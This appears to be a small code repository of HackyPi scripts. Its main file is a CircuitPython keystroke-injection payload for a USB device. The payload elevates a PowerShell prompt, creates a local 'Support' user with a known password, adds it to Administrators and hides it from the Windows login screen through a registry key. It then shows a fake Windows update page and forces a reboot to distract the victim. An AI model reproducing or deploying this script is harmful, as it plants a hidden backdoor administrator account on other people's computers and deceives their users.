├── .gitattributes
├── .gitignore
├── README.md
└── add_hidden_admin.py


/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | # Byte-compiled / optimized / DLL files
  2 | __pycache__/
  3 | *.py[cod]
  4 | *$py.class
  5 | 
  6 | # C extensions
  7 | *.so
  8 | 
  9 | # Distribution / packaging
 10 | .Python
 11 | build/
 12 | develop-eggs/
 13 | dist/
 14 | downloads/
 15 | eggs/
 16 | .eggs/
 17 | lib/
 18 | lib64/
 19 | parts/
 20 | sdist/
 21 | var/
 22 | wheels/
 23 | share/python-wheels/
 24 | *.egg-info/
 25 | .installed.cfg
 26 | *.egg
 27 | MANIFEST
 28 | 
 29 | # PyInstaller
 30 | #  Usually these files are written by a python script from a template
 31 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
 32 | *.manifest
 33 | *.spec
 34 | 
 35 | # Installer logs
 36 | pip-log.txt
 37 | pip-delete-this-directory.txt
 38 | 
 39 | # Unit test / coverage reports
 40 | htmlcov/
 41 | .tox/
 42 | .nox/
 43 | .coverage
 44 | .coverage.*
 45 | .cache
 46 | nosetests.xml
 47 | coverage.xml
 48 | *.cover
 49 | *.py,cover
 50 | .hypothesis/
 51 | .pytest_cache/
 52 | cover/
 53 | 
 54 | # Translations
 55 | *.mo
 56 | *.pot
 57 | 
 58 | # Django stuff:
 59 | *.log
 60 | local_settings.py
 61 | db.sqlite3
 62 | db.sqlite3-journal
 63 | 
 64 | # Flask stuff:
 65 | instance/
 66 | .webassets-cache
 67 | 
 68 | # Scrapy stuff:
 69 | .scrapy
 70 | 
 71 | # Sphinx documentation
 72 | docs/_build/
 73 | 
 74 | # PyBuilder
 75 | .pybuilder/
 76 | target/
 77 | 
 78 | # Jupyter Notebook
 79 | .ipynb_checkpoints
 80 | 
 81 | # IPython
 82 | profile_default/
 83 | ipython_config.py
 84 | 
 85 | # pyenv
 86 | #   For a library or package, you might want to ignore these files since the code is
 87 | #   intended to run in multiple environments; otherwise, check them in:
 88 | # .python-version
 89 | 
 90 | # pipenv
 91 | #   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
 92 | #   However, in case of collaboration, if having platform-specific dependencies or dependencies
 93 | #   having no cross-platform support, pipenv may install dependencies that don't work, or not
 94 | #   install all needed dependencies.
 95 | #Pipfile.lock
 96 | 
 97 | # poetry
 98 | #   Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control.
 99 | #   This is especially recommended for binary packages to ensure reproducibility, and is more
100 | #   commonly ignored for libraries.
101 | #   https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control
102 | #poetry.lock
103 | 
104 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow
105 | __pypackages__/
106 | 
107 | # Celery stuff
108 | celerybeat-schedule
109 | celerybeat.pid
110 | 
111 | # SageMath parsed files
112 | *.sage.py
113 | 
114 | # Environments
115 | .env
116 | .venv
117 | env/
118 | venv/
119 | ENV/
120 | env.bak/
121 | venv.bak/
122 | 
123 | # Spyder project settings
124 | .spyderproject
125 | .spyproject
126 | 
127 | # Rope project settings
128 | .ropeproject
129 | 
130 | # mkdocs documentation
131 | /site
132 | 
133 | # mypy
134 | .mypy_cache/
135 | .dmypy.json
136 | dmypy.json
137 | 
138 | # Pyre type checker
139 | .pyre/
140 | 
141 | # pytype static type analyzer
142 | .pytype/
143 | 
144 | # Cython debug symbols
145 | cython_debug/
146 | 
147 | # PyCharm
148 | #  JetBrains specific template is maintainted in a separate JetBrains.gitignore that can
149 | #  be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore
150 | #  and can be added to the global gitignore or merged into this file.  For a more nuclear
151 | #  option (not recommended) you can uncomment the following to ignore the entire idea folder.
152 | #.idea/
153 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # HackyPi Scripts
2 |  Scripts to use with HackyPi
3 | 


--------------------------------------------------------------------------------
/add_hidden_admin.py:
--------------------------------------------------------------------------------
  1 | import time
  2 | import os
  3 | import usb_hid
  4 | import digitalio
  5 | import board
  6 | import busio
  7 | import terminalio
  8 | import displayio
  9 | from adafruit_display_text import label
 10 | from adafruit_hid.keyboard import Keyboard, Keycode
 11 | from keyboard_layout_win_de import KeyboardLayout
 12 | from adafruit_st7789 import ST7789
 13 | 
 14 | # Constants for the display settings
 15 | BORDER = 12
 16 | FONTSCALE = 3
 17 | BACKGROUND_COLOR = 0xFF0000  # Red background color
 18 | FOREGROUND_COLOR = 0xFFFF00  # Yellow foreground color
 19 | TEXT_COLOR = 0x0000FF  # Blue text color
 20 | 
 21 | # Release any existing displays
 22 | displayio.release_displays()
 23 | 
 24 | # Define the pins for the TFT display
 25 | tft_clk = board.GP10
 26 | tft_mosi = board.GP11
 27 | tft_rst = board.GP12
 28 | tft_dc = board.GP8
 29 | tft_cs = board.GP9
 30 | 
 31 | # Create the SPI bus for communication with the TFT display
 32 | spi = busio.SPI(clock=tft_clk, MOSI=tft_mosi)
 33 | 
 34 | # Initialize the TFT display
 35 | display_bus = displayio.FourWire(spi, command=tft_dc, chip_select=tft_cs, reset=tft_rst)
 36 | display = ST7789(
 37 |     display_bus, rotation=270, width=240, height=135, rowstart=40, colstart=53
 38 | )
 39 | 
 40 | # Create a splash group to hold the display elements
 41 | splash = displayio.Group()
 42 | display.show(splash)
 43 | 
 44 | # Create the background color bitmap and palette
 45 | color_bitmap = displayio.Bitmap(display.width, display.height, 1)
 46 | color_palette = displayio.Palette(1)
 47 | color_palette[0] = BACKGROUND_COLOR
 48 | 
 49 | # Create the background sprite and add it to the splash group
 50 | tft_bl = board.GP13
 51 | led = digitalio.DigitalInOut(tft_bl)
 52 | led.direction = digitalio.Direction.OUTPUT
 53 | led.value = True
 54 | 
 55 | bg_sprite = displayio.TileGrid(color_bitmap, pixel_shader=color_palette, x=0, y=0)
 56 | splash.append(bg_sprite)
 57 | 
 58 | 
 59 | def inner_rectangle():
 60 |     """
 61 |     The inner_rectangle function creates a bitmap and palette for the inner rectangle.
 62 |     The bitmap is created with a width of display.width - BORDER * 2, which is the same as
 63 |     display.width - (BORDER + BORDER). The height of the bitmap is also calculated in this way:
 64 |     display.height - (BORDER + BORDER). This means that we are creating a rectangle that has an area
 65 |     equal to display_area minus twice the border size.
 66 | 
 67 |     :return: A rectangle that is smaller than the outer one
 68 |     """
 69 | 
 70 |     inner_bitmap = displayio.Bitmap(
 71 |         display.width - BORDER * 2, display.height - BORDER * 2, 1
 72 |     )
 73 |     inner_palette = displayio.Palette(1)
 74 |     inner_palette[0] = FOREGROUND_COLOR
 75 |     inner_sprite = displayio.TileGrid(
 76 |         inner_bitmap, pixel_shader=inner_palette, x=BORDER, y=BORDER
 77 |     )
 78 |     splash.append(inner_sprite)
 79 | 
 80 | 
 81 | def print_onTFT(text, x_pos, y_pos):
 82 |     """
 83 |     The print_onTFT function takes three arguments:
 84 |         text - the string to be printed on the TFT display
 85 |         x_pos - the horizontal position of where you want your text to start printing (in pixels)
 86 |         y_pos - the vertical position of where you want your text to start printing (in pixels)
 87 | 
 88 |     :param text: Set the text that will be displayed on the tft screen
 89 |     :param x_pos: Set the x position of the text on screen
 90 |     :param y_pos: Set the y position of the text on the screen
 91 |     :return: The text_group object
 92 |     """
 93 | 
 94 |     # Create a label with the provided text and color
 95 |     text_area = label.Label(terminalio.FONT, text=text, color=TEXT_COLOR)
 96 |     text_group = displayio.Group(
 97 |         scale=FONTSCALE,
 98 |         x=x_pos,
 99 |         y=y_pos,
100 |     )
101 |     text_group.append(text_area)
102 |     splash.append(text_group)
103 | 
104 | 
105 | # Main code starts here
106 | try:
107 |     # Display the first inner rectangle with the title "ELEVATION" in the center
108 |     inner_rectangle()
109 |     keyboard = Keyboard(usb_hid.devices)
110 |     keyboard_layout = KeyboardLayout(keyboard)
111 |     print_onTFT("ELEVATION", 60, 40)
112 | 
113 |     # Simulate pressing the Windows+D keys to minimize all windows
114 |     time.sleep(1)
115 |     keyboard.send(Keycode.WINDOWS, Keycode.D)
116 |     keyboard.send(Keycode.WINDOWS, Keycode.X)
117 |     time.sleep(0.3)
118 |     keyboard.send(Keycode.A)
119 |     keyboard.release_all()
120 |     time.sleep(1)
121 | 
122 |     # Simulate pressing the left arrow key
123 |     keyboard.send(Keycode.LEFT_ARROW)
124 | 
125 |     # Simulate pressing the Enter key
126 |     keyboard.send(Keycode.ENTER)
127 |     time.sleep(0.5)
128 |     keyboard.release_all()
129 |     print_onTFT("COMPLETE", 60, 80)
130 | 
131 |     time.sleep(1)
132 | 
133 |     # Display the second inner rectangle with the title "PAYLOAD" in the center
134 |     inner_rectangle()
135 |     print_onTFT("PAYLOAD", 60, 40)
136 | 
137 |     # Simulate typing commands to add a new user and add them to the Administrators group
138 |     keyboard_layout.write("net user Support Support /add")
139 |     time.sleep(0.5)
140 |     keyboard.send(Keycode.ENTER)
141 | 
142 |     keyboard_layout.write("net localgroup Administrators Support /add")
143 |     time.sleep(0.5)
144 |     keyboard.send(Keycode.ENTER)
145 | 
146 |     keyboard_layout.write(
147 |         'reg add "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist" /v Support /t REG_DWORD /d 0 /f'
148 |     )
149 |     time.sleep(0.5)
150 |     keyboard.send(Keycode.ENTER)
151 | 
152 |     print_onTFT("COMPLETE", 60, 80)
153 |     time.sleep(1)
154 | 
155 |     # Display the third inner rectangle with the title "DISTRACTION" in the center
156 |     inner_rectangle()
157 |     print_onTFT("DISTRACTION", 60, 40)
158 | 
159 |     # Simulate typing a PowerShell command to open a fake Windows update page and then reboot
160 |     keyboard_layout.write(
161 |         'Start-Process "https://fakeupdate.net/win10ue/"; shutdown /r /t 20; exit'
162 |     )
163 |     keyboard.send(Keycode.ENTER)
164 |     time.sleep(2)
165 |     keyboard.send(Keycode.Enter)
166 |     keyboard.send(Keycode.F11)
167 | 
168 |     # Display the fourth inner rectangle with the title "COMPLETE" in the center
169 |     inner_rectangle()
170 |     print_onTFT("COMPLETE", 60, 80)
171 | 
172 |     keyboard.release_all()
173 | 
174 | except Exception as ex:
175 |     keyboard.release_all()
176 |     raise ex
177 | 


--------------------------------------------------------------------------------